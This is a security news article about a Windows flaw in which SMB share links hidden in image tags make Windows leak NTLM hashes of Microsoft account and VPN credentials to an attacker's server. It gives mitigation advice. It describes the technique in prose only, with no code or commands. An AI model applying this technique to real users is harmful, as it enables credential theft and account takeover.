Categories: Security newsTechnology

Microsoft Account Passwords, VPN Credentials Leaked Due To Windows Flaw

All Windows versions have a flaw that leak Microsoft account passwords and VPN credentials

If a Microsoft user is using a VPN (virtual private network) to browse the Internet, there are chances that the user’s Microsoft account username and password or VPN credentials could be leaked. The reason behind this is assumed to be the error by Windows in handling its old validation procedures for shared network resources.

The exploit depends on an attacker inserting a link to an SMB resource (network share) inside an email or a Web page that gets noticed via Outlook.

Inside the image tags, the attacker can camouflage the link to his network share. Further, they can put the link to a network share hosted on his own network instead of the proper image link.

When a user tries to use the link via Internet Explorer, Edge, or Outlook, their computer even via the Internet will automatically send their login credentials to validate on the criminal’s domain. The reason is due to the way Windows manages authentication for network shares.

Even though Microsoft account password is not leaked in cleartext, researchers demonstrated a long time ago that as an NTLM hash, these could be easily cracked.

This isn’t even something new, since Microsoft and the researcher community have known about this issue since 1997 and often discussed it at security conferences such as Black Hat.

This was not an issue in the past, as Windows accounts were using machine-localized usernames and password. However, Microsoft started to allow users to validate on their computers with Microsoft accounts after it introduced Windows 8 and upwards. By the time, Windows 10 was out; this became the de-facto standard validation method implying that it was used by more users.

Microsoft has begun to associate all its online realities with the user’s same Microsoft account in the recent years. This old attack now allows a crook to access credentials for Microsoft accounts, which in turn will also grant them indirect entry to all kinds of services like Skype, OneDrive, Xbox, Bing, MSN, Office 360, Azure, and more, says ValdikSS from ProstoVPN.

To make things worse, the user’s VPN credentials get leaked if the user is making use of a VPN connection to load the fraudulent SMB resource. This allows the crook to access the victim’s VPN account.

“Microsoft successfully fixed some issues, some other issues were half-fixed, and another ones are not fixed at all and could be exploited up to this day,” ValdikSS explains. “The problem of transmitting account credentials to the SMB server over the internet is one of the not fixed ones.”

One can simply protect themselves against such attacks is by obstructing all outgoing SMB connections (port 445) via the Windows firewall, except for local networks, ValdikSS says. However, the best solution against such attack would be to not use your Microsoft account to log into your Windows PC.

Kavita Iyer

An individual, optimist, homemaker, foodie, a die hard cricket fan and most importantly one who believes in Being Human

Recent Posts

iOS web attack crashes, causes iPhones or iPads to restart

This new CSS-based web attack can crash and restart iPhones or iPads and can cause a Mac computer to freeze…

8 hours ago

Nvidia GeForce RTX 2080 Ti Release Postponed To September 27th

Nvidia delays the launch date of GeForce RTX 2080 Ti by a week Nvidia has decided to postpone the release…

1 day ago

Samsung’s Galaxy Note 9 catches fire in woman’s purse

Woman sues Samsung over Galaxy Note 9 bursting into flames A woman in Long Island has filed a lawsuit against Samsung after…

1 day ago

North Korean hacker charged for WannaCry and Sony cyberattacks

U.S. charges North Korean hacker for WannaCry, Sony cyber attacks The U.S. government on Thursday charged and sanctioned a North…

2 weeks ago

Google launches ‘Dataset Search’ to help scientists and journalists

Google Dataset Search: This new search engine helps scientists hunt for public data Google on Wednesday launched a new search…

2 weeks ago

Android Q will warn users for running apps made for older Android versions

Android Q will soon warn apps running on Android Lollipop or earlier It’s only been a month since Google has…

2 weeks ago